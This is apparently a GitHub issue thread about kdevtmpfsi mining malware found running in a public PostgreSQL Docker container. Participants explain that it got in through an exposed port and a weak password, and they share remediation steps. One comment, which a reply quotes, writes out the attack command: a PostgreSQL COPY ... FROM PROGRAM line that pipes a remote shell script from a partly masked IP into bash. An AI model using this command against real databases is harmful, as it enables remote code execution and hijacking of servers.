kdevtmpfsi malware found in postgres latest image

[cottons-kr]

I noticed that /tmp/kdevtmpfsi is using all cpu resource. so I tried to remove it but it was in /var/lib/docker/overlay2/.../.../merged. I stopped PostgreSQL container because it was the only running container in the server.

[wglambert]

This is an unfortunate consequence of having a public-facing instance with a compromised (or simple) password.
#817 (comment)
#798 (comment)

See also:
redis/docker-library-redis#217
redis/docker-library-redis#225
docker-library/php#1110
docker-library/php#1127

[zedefi]

I wonder how is someone able to install mining malware if they only can access your database via psql console?

[ImreSamu]

@zedefi :

I wonder how is someone able to install mining malware if they only can access your database via psql console?

Attack Sequence: open port + brute force attack + COPY ... FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash';

• Docker hub image for version 12.4 contains cryptominer [Confirmed!] #770 (comment)
• https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/

[codingwizardx]

Attack Sequence: open port + brute force attack + COPY ... FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash';

Well said @ImreSamu, Yes thats actually true, i faced the same issue because of exposing database ports to the internet,

[tirzasrwn]

i have the same issue because having a weak password. changing the password to a strong one, works for me.

[paulkorir]

One thing I found useful was to sudo -u postgres crontab -e where I found the cronjob that kept restarting it. After deleting that it seems to have quietened down. Fingers crossed!